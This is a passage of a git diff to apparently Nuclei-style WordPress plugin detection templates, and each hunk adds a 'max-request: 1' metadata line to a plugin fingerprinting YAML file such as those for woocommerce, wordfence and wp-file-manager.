     plugin_namespace: regenerate-thumbnails
     wpscan: https://wpscan.com/plugin/regenerate-thumbnails
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/safe-svg.yaml b/http/technologies/wordpress/plugins/safe-svg.yaml
index 7c13b8d2a4..4a29cecdb0 100644
--- a/http/technologies/wordpress/plugins/safe-svg.yaml
+++ b/http/technologies/wordpress/plugins/safe-svg.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/safe-svg/
   metadata:
+    max-request: 1
     plugin_namespace: safe-svg
     wpscan: https://wpscan.com/plugin/safe-svg
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/seo-by-rank-math.yaml b/http/technologies/wordpress/plugins/seo-by-rank-math.yaml
index 53b30ba721..be281d91e6 100644
--- a/http/technologies/wordpress/plugins/seo-by-rank-math.yaml
+++ b/http/technologies/wordpress/plugins/seo-by-rank-math.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/seo-by-rank-math/
   metadata:
+    max-request: 1
     plugin_namespace: seo-by-rank-math
     wpscan: https://wpscan.com/plugin/seo-by-rank-math
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/sg-cachepress.yaml b/http/technologies/wordpress/plugins/sg-cachepress.yaml
index dc3d446af3..41baa25eb7 100644
--- a/http/technologies/wordpress/plugins/sg-cachepress.yaml
+++ b/http/technologies/wordpress/plugins/sg-cachepress.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/sg-cachepress/
   metadata:
+    max-request: 1
     plugin_namespace: sg-cachepress
     wpscan: https://wpscan.com/plugin/sg-cachepress
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/sg-security.yaml b/http/technologies/wordpress/plugins/sg-security.yaml
index 96b4699d2d..ee389af6ec 100644
--- a/http/technologies/wordpress/plugins/sg-security.yaml
+++ b/http/technologies/wordpress/plugins/sg-security.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/sg-security/
   metadata:
+    max-request: 1
     plugin_namespace: sg-security
     wpscan: https://wpscan.com/plugin/sg-security
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml b/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml
index 17584cd064..1bb9a283ce 100644
--- a/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml
+++ b/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/shortcodes-ultimate/
   metadata:
+    max-request: 1
     plugin_namespace: shortcodes-ultimate
     wpscan: https://wpscan.com/plugin/shortcodes-ultimate
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml b/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml
index 015fb97043..7836d9554c 100644
--- a/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml
+++ b/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/shortpixel-image-optimiser/
   metadata:
+    max-request: 1
     plugin_namespace: shortpixel-image-optimiser
     wpscan: https://wpscan.com/plugin/shortpixel-image-optimiser
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/simple-custom-post-order.yaml b/http/technologies/wordpress/plugins/simple-custom-post-order.yaml
index 1d5224b457..ccd72e427a 100644
--- a/http/technologies/wordpress/plugins/simple-custom-post-order.yaml
+++ b/http/technologies/wordpress/plugins/simple-custom-post-order.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/simple-custom-post-order/
   metadata:
+    max-request: 1
     plugin_namespace: simple-custom-post-order
     wpscan: https://wpscan.com/plugin/simple-custom-post-order
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/siteguard.yaml b/http/technologies/wordpress/plugins/siteguard.yaml
index aafd6c6a38..3622b2c6b3 100644
--- a/http/technologies/wordpress/plugins/siteguard.yaml
+++ b/http/technologies/wordpress/plugins/siteguard.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/siteguard/
   metadata:
+    max-request: 1
     plugin_namespace: siteguard
     wpscan: https://wpscan.com/plugin/siteguard
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/siteorigin-panels.yaml b/http/technologies/wordpress/plugins/siteorigin-panels.yaml
index e10ab985da..9eff765d61 100644
--- a/http/technologies/wordpress/plugins/siteorigin-panels.yaml
+++ b/http/technologies/wordpress/plugins/siteorigin-panels.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/siteorigin-panels/
   metadata:
+    max-request: 1
     plugin_namespace: siteorigin-panels
     wpscan: https://wpscan.com/plugin/siteorigin-panels
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/smart-slider-3.yaml b/http/technologies/wordpress/plugins/smart-slider-3.yaml
index 9881b591ae..c856e1fa9e 100644
--- a/http/technologies/wordpress/plugins/smart-slider-3.yaml
+++ b/http/technologies/wordpress/plugins/smart-slider-3.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/smart-slider-3/
   metadata:
+    max-request: 1
     plugin_namespace: smart-slider-3
     wpscan: https://wpscan.com/plugin/smart-slider-3
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/so-widgets-bundle.yaml b/http/technologies/wordpress/plugins/so-widgets-bundle.yaml
index 0480b4b0e6..008440cc58 100644
--- a/http/technologies/wordpress/plugins/so-widgets-bundle.yaml
+++ b/http/technologies/wordpress/plugins/so-widgets-bundle.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/so-widgets-bundle/
   metadata:
+    max-request: 1
     plugin_namespace: so-widgets-bundle
     wpscan: https://wpscan.com/plugin/so-widgets-bundle
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml b/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml
index 26d525386b..410776862f 100644
--- a/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml
+++ b/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/stops-core-theme-and-plugin-updates/
   metadata:
+    max-request: 1
     plugin_namespace: stops-core-theme-and-plugin-updates
     wpscan: https://wpscan.com/plugin/stops-core-theme-and-plugin-updates
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/sucuri-scanner.yaml b/http/technologies/wordpress/plugins/sucuri-scanner.yaml
index 3920c5cf56..f210a2a2f9 100644
--- a/http/technologies/wordpress/plugins/sucuri-scanner.yaml
+++ b/http/technologies/wordpress/plugins/sucuri-scanner.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/sucuri-scanner/
   metadata:
+    max-request: 1
     plugin_namespace: sucuri-scanner
     wpscan: https://wpscan.com/plugin/sucuri-scanner
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/svg-support.yaml b/http/technologies/wordpress/plugins/svg-support.yaml
index f556786f5a..f1dd1bf150 100644
--- a/http/technologies/wordpress/plugins/svg-support.yaml
+++ b/http/technologies/wordpress/plugins/svg-support.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/svg-support/
   metadata:
+    max-request: 1
     plugin_namespace: svg-support
     wpscan: https://wpscan.com/plugin/svg-support
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/table-of-contents-plus.yaml b/http/technologies/wordpress/plugins/table-of-contents-plus.yaml
index 844e3d19a0..a9ec913599 100644
--- a/http/technologies/wordpress/plugins/table-of-contents-plus.yaml
+++ b/http/technologies/wordpress/plugins/table-of-contents-plus.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/table-of-contents-plus/
   metadata:
+    max-request: 1
     plugin_namespace: table-of-contents-plus
     wpscan: https://wpscan.com/plugin/table-of-contents-plus
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/tablepress.yaml b/http/technologies/wordpress/plugins/tablepress.yaml
index eb0f02f602..d38aeb0279 100644
--- a/http/technologies/wordpress/plugins/tablepress.yaml
+++ b/http/technologies/wordpress/plugins/tablepress.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/tablepress/
   metadata:
+    max-request: 1
     plugin_namespace: tablepress
     wpscan: https://wpscan.com/plugin/tablepress
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml b/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml
index 755efd53fa..07c43b9d80 100644
--- a/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml
+++ b/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/taxonomy-terms-order/
   metadata:
+    max-request: 1
     plugin_namespace: taxonomy-terms-order
     wpscan: https://wpscan.com/plugin/taxonomy-terms-order
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/the-events-calendar.yaml b/http/technologies/wordpress/plugins/the-events-calendar.yaml
index 0403bb4e72..83a849e11e 100644
--- a/http/technologies/wordpress/plugins/the-events-calendar.yaml
+++ b/http/technologies/wordpress/plugins/the-events-calendar.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/the-events-calendar/
   metadata:
+    max-request: 1
     plugin_namespace: the-events-calendar
     wpscan: https://wpscan.com/plugin/the-events-calendar
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/themeisle-companion.yaml b/http/technologies/wordpress/plugins/themeisle-companion.yaml
index cd2632ea05..c6100637d9 100644
--- a/http/technologies/wordpress/plugins/themeisle-companion.yaml
+++ b/http/technologies/wordpress/plugins/themeisle-companion.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/themeisle-companion/
   metadata:
+    max-request: 1
     plugin_namespace: themeisle-companion
     wpscan: https://wpscan.com/plugin/themeisle-companion
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/tinymce-advanced.yaml b/http/technologies/wordpress/plugins/tinymce-advanced.yaml
index b5f8b822c7..1f188b66c6 100644
--- a/http/technologies/wordpress/plugins/tinymce-advanced.yaml
+++ b/http/technologies/wordpress/plugins/tinymce-advanced.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/tinymce-advanced/
   metadata:
+    max-request: 1
     plugin_namespace: tinymce-advanced
     wpscan: https://wpscan.com/plugin/tinymce-advanced
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/translatepress-multilingual.yaml b/http/technologies/wordpress/plugins/translatepress-multilingual.yaml
index 85aaf7ff16..2c7b16cb44 100644
--- a/http/technologies/wordpress/plugins/translatepress-multilingual.yaml
+++ b/http/technologies/wordpress/plugins/translatepress-multilingual.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/translatepress-multilingual/
   metadata:
+    max-request: 1
     plugin_namespace: translatepress-multilingual
     wpscan: https://wpscan.com/plugin/translatepress-multilingual
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml b/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml
index 0af322b728..9d6afa8d3f 100644
--- a/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml
+++ b/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/ultimate-addons-for-gutenberg/
   metadata:
+    max-request: 1
     plugin_namespace: ultimate-addons-for-gutenberg
     wpscan: https://wpscan.com/plugin/ultimate-addons-for-gutenberg
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/under-construction-page.yaml b/http/technologies/wordpress/plugins/under-construction-page.yaml
index d4ac0d179e..87721a245a 100644
--- a/http/technologies/wordpress/plugins/under-construction-page.yaml
+++ b/http/technologies/wordpress/plugins/under-construction-page.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/under-construction-page/
   metadata:
+    max-request: 1
     plugin_namespace: under-construction-page
     wpscan: https://wpscan.com/plugin/under-construction-page
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/updraftplus.yaml b/http/technologies/wordpress/plugins/updraftplus.yaml
index dbbadf3cfc..45e0dead0e 100644
--- a/http/technologies/wordpress/plugins/updraftplus.yaml
+++ b/http/technologies/wordpress/plugins/updraftplus.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/updraftplus/
   metadata:
+    max-request: 1
     plugin_namespace: updraftplus
     wpscan: https://wpscan.com/plugin/updraftplus
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/use-any-font.yaml b/http/technologies/wordpress/plugins/use-any-font.yaml
index 401b0e479f..abec174ec3 100644
--- a/http/technologies/wordpress/plugins/use-any-font.yaml
+++ b/http/technologies/wordpress/plugins/use-any-font.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/use-any-font/
   metadata:
+    max-request: 1
     plugin_namespace: use-any-font
     wpscan: https://wpscan.com/plugin/use-any-font
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/user-role-editor.yaml b/http/technologies/wordpress/plugins/user-role-editor.yaml
index 6f95506748..e088ac07a6 100644
--- a/http/technologies/wordpress/plugins/user-role-editor.yaml
+++ b/http/technologies/wordpress/plugins/user-role-editor.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/user-role-editor/
   metadata:
+    max-request: 1
     plugin_namespace: user-role-editor
     wpscan: https://wpscan.com/plugin/user-role-editor
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/velvet-blues-update-urls.yaml b/http/technologies/wordpress/plugins/velvet-blues-update-urls.yaml
index 4404f87aab..8b163200bf 100644
--- a/http/technologies/wordpress/plugins/velvet-blues-update-urls.yaml
+++ b/http/technologies/wordpress/plugins/velvet-blues-update-urls.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/velvet-blues-update-urls/
   metadata:
+    max-request: 1
     plugin_namespace: velvet-blues-update-urls
     wpscan: https://wpscan.com/plugin/velvet-blues-update-urls
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/w3-total-cache.yaml b/http/technologies/wordpress/plugins/w3-total-cache.yaml
index 8995434fce..2366a7dad7 100644
--- a/http/technologies/wordpress/plugins/w3-total-cache.yaml
+++ b/http/technologies/wordpress/plugins/w3-total-cache.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/w3-total-cache/
   metadata:
+    max-request: 1
     plugin_namespace: w3-total-cache
     wpscan: https://wpscan.com/plugin/w3-total-cache
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/webp-converter-for-media.yaml b/http/technologies/wordpress/plugins/webp-converter-for-media.yaml
index 8175806cb8..71448e61e8 100644
--- a/http/technologies/wordpress/plugins/webp-converter-for-media.yaml
+++ b/http/technologies/wordpress/plugins/webp-converter-for-media.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/webp-converter-for-media/
   metadata:
+    max-request: 1
     plugin_namespace: webp-converter-for-media
     wpscan: https://wpscan.com/plugin/webp-converter-for-media
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/webp-express.yaml b/http/technologies/wordpress/plugins/webp-express.yaml
index db82bc7f43..717554b89f 100644
--- a/http/technologies/wordpress/plugins/webp-express.yaml
+++ b/http/technologies/wordpress/plugins/webp-express.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/webp-express/
   metadata:
+    max-request: 1
     plugin_namespace: webp-express
     wpscan: https://wpscan.com/plugin/webp-express
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/widget-importer-exporter.yaml b/http/technologies/wordpress/plugins/widget-importer-exporter.yaml
index 03ddae57bc..fba5c8b09c 100644
--- a/http/technologies/wordpress/plugins/widget-importer-exporter.yaml
+++ b/http/technologies/wordpress/plugins/widget-importer-exporter.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/widget-importer-exporter/
   metadata:
+    max-request: 1
     plugin_namespace: widget-importer-exporter
     wpscan: https://wpscan.com/plugin/widget-importer-exporter
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml b/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml
index d6449bb5bf..631202198e 100644
--- a/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml
+++ b/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/woo-cart-abandonment-recovery/
   metadata:
+    max-request: 1
     plugin_namespace: woo-cart-abandonment-recovery
     wpscan: https://wpscan.com/plugin/woo-cart-abandonment-recovery
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml b/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml
index 2d5fdf1779..cc953078eb 100644
--- a/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml
+++ b/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/woo-checkout-field-editor-pro/
   metadata:
+    max-request: 1
     plugin_namespace: woo-checkout-field-editor-pro
     wpscan: https://wpscan.com/plugin/woo-checkout-field-editor-pro
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/woo-variation-swatches.yaml b/http/technologies/wordpress/plugins/woo-variation-swatches.yaml
index 6b5705e20d..97ce674116 100644
--- a/http/technologies/wordpress/plugins/woo-variation-swatches.yaml
+++ b/http/technologies/wordpress/plugins/woo-variation-swatches.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/woo-variation-swatches/
   metadata:
+    max-request: 1
     plugin_namespace: woo-variation-swatches
     wpscan: https://wpscan.com/plugin/woo-variation-swatches
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/woocommerce-gateway-paypal-express-checkout.yaml b/http/technologies/wordpress/plugins/woocommerce-gateway-paypal-express-checkout.yaml
index dbcdb64bad..6d05a6f058 100644
--- a/http/technologies/wordpress/plugins/woocommerce-gateway-paypal-express-checkout.yaml
+++ b/http/technologies/wordpress/plugins/woocommerce-gateway-paypal-express-checkout.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/woocommerce-gateway-paypal-express-checkout/
   metadata:
+    max-request: 1
     plugin_namespace: woocommerce-gateway-paypal-express-checkout
     wpscan: https://wpscan.com/plugin/woocommerce-gateway-paypal-express-checkout
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml b/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml
index fb9ea502ce..baf5af3bb5 100644
--- a/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml
+++ b/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/woocommerce-gateway-stripe/
   metadata:
+    max-request: 1
     plugin_namespace: woocommerce-gateway-stripe
     wpscan: https://wpscan.com/plugin/woocommerce-gateway-stripe
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/woocommerce-payments.yaml b/http/technologies/wordpress/plugins/woocommerce-payments.yaml
index 48ffb25245..aa1898c4ba 100644
--- a/http/technologies/wordpress/plugins/woocommerce-payments.yaml
+++ b/http/technologies/wordpress/plugins/woocommerce-payments.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/woocommerce-payments/
   metadata:
+    max-request: 1
     plugin_namespace: woocommerce-payments
     wpscan: https://wpscan.com/plugin/woocommerce-payments
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml b/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml
index 4fa6fc3ffe..5fae796fdd 100644
--- a/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml
+++ b/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/woocommerce-paypal-payments/
   metadata:
+    max-request: 1
     plugin_namespace: woocommerce-paypal-payments
     wpscan: https://wpscan.com/plugin/woocommerce-paypal-payments
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml b/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml
index 1c1c690fcd..22f812e2b8 100644
--- a/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml
+++ b/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/woocommerce-pdf-invoices-packing-slips/
   metadata:
+    max-request: 1
     plugin_namespace: woocommerce-pdf-invoices-packing-slips
     wpscan: https://wpscan.com/plugin/woocommerce-pdf-invoices-packing-slips
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/woocommerce-services.yaml b/http/technologies/wordpress/plugins/woocommerce-services.yaml
index 4d6702d81a..c637006d26 100644
--- a/http/technologies/wordpress/plugins/woocommerce-services.yaml
+++ b/http/technologies/wordpress/plugins/woocommerce-services.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/woocommerce-services/
   metadata:
+    max-request: 1
     plugin_namespace: woocommerce-services
     wpscan: https://wpscan.com/plugin/woocommerce-services
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/woocommerce.yaml b/http/technologies/wordpress/plugins/woocommerce.yaml
index 42cb8bc409..e020507ccb 100644
--- a/http/technologies/wordpress/plugins/woocommerce.yaml
+++ b/http/technologies/wordpress/plugins/woocommerce.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/woocommerce/
   metadata:
+    max-request: 1
     plugin_namespace: woocommerce
     wpscan: https://wpscan.com/plugin/woocommerce
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/wordfence.yaml b/http/technologies/wordpress/plugins/wordfence.yaml
index 55d6effbf5..c92903fd79 100644
--- a/http/technologies/wordpress/plugins/wordfence.yaml
+++ b/http/technologies/wordpress/plugins/wordfence.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/wordfence/
   metadata:
+    max-request: 1
     plugin_namespace: wordfence
     wpscan: https://wpscan.com/plugin/wordfence
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/wordpress-importer.yaml b/http/technologies/wordpress/plugins/wordpress-importer.yaml
index 6786cab703..c25b2c1c48 100644
--- a/http/technologies/wordpress/plugins/wordpress-importer.yaml
+++ b/http/technologies/wordpress/plugins/wordpress-importer.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/wordpress-importer/
   metadata:
+    max-request: 1
     plugin_namespace: wordpress-importer
     wpscan: https://wpscan.com/plugin/wordpress-importer
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/wordpress-seo.yaml b/http/technologies/wordpress/plugins/wordpress-seo.yaml
index 784ba22c8a..4d6dd14d25 100644
--- a/http/technologies/wordpress/plugins/wordpress-seo.yaml
+++ b/http/technologies/wordpress/plugins/wordpress-seo.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/wordpress-seo/
   metadata:
+    max-request: 1
     plugin_namespace: wordpress-seo
     wpscan: https://wpscan.com/plugin/wordpress-seo
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/worker.yaml b/http/technologies/wordpress/plugins/worker.yaml
index 72ff55e58a..7ca0870ed6 100644
--- a/http/technologies/wordpress/plugins/worker.yaml
+++ b/http/technologies/wordpress/plugins/worker.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/worker/
   metadata:
+    max-request: 1
     plugin_namespace: worker
     wpscan: https://wpscan.com/plugin/worker
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/wp-fastest-cache.yaml b/http/technologies/wordpress/plugins/wp-fastest-cache.yaml
index 8cfaa0f5a9..4f0d9be568 100644
--- a/http/technologies/wordpress/plugins/wp-fastest-cache.yaml
+++ b/http/technologies/wordpress/plugins/wp-fastest-cache.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/wp-fastest-cache/
   metadata:
+    max-request: 1
     plugin_namespace: wp-fastest-cache
     wpscan: https://wpscan.com/plugin/wp-fastest-cache
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/wp-file-manager.yaml b/http/technologies/wordpress/plugins/wp-file-manager.yaml
index 85900a01a7..f3c481b824 100644
--- a/http/technologies/wordpress/plugins/wp-file-manager.yaml
+++ b/http/technologies/wordpress/plugins/wp-file-manager.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/wp-file-manager/
   metadata:
+    max-request: 1
     plugin_namespace: wp-file-manager
     wpscan: https://wpscan.com/plugin/wp-file-manager
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/wp-google-maps.yaml b/http/technologies/wordpress/plugins/wp-google-maps.yaml
index a7ccde0b49..ba214fd7ea 100644
--- a/http/technologies/wordpress/plugins/wp-google-maps.yaml
+++ b/http/technologies/wordpress/plugins/wp-google-maps.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/wp-google-maps/
   metadata:
+    max-request: 1
     plugin_namespace: wp-google-maps
     wpscan: https://wpscan.com/plugin/wp-google-maps
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/wp-mail-smtp.yaml b/http/technologies/wordpress/plugins/wp-mail-smtp.yaml
index 422664a98c..8f5fe8d9a5 100644
--- a/http/technologies/wordpress/plugins/wp-mail-smtp.yaml
+++ b/http/technologies/wordpress/plugins/wp-mail-smtp.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/wp-mail-smtp/
   metadata:
+    max-request: 1
     plugin_namespace: wp-mail-smtp
     wpscan: https://wpscan.com/plugin/wp-mail-smtp
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml b/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml
index f0af3a748a..0458b13354 100644
--- a/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml
+++ b/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/wp-maintenance-mode/
   metadata:
+    max-request: 1
     plugin_namespace: wp-maintenance-mode
     wpscan: https://wpscan.com/plugin/wp-maintenance-mode
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/wp-migrate-db.yaml b/http/technologies/wordpress/plugins/wp-migrate-db.yaml
index f89f1a20b3..d570be07bf 100644
--- a/http/technologies/wordpress/plugins/wp-migrate-db.yaml
+++ b/http/technologies/wordpress/plugins/wp-migrate-db.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/wp-migrate-db/
   metadata:
+    max-request: 1
     plugin_namespace: wp-migrate-db
     wpscan: https://wpscan.com/plugin/wp-migrate-db
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml b/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml
index 01fb12d0ad..ee05e3add8 100644
--- a/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml
+++ b/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/wp-multibyte-patch/
   metadata:
+    max-request: 1
     plugin_namespace: wp-multibyte-patch
     wpscan: https://wpscan.com/plugin/wp-multibyte-patch
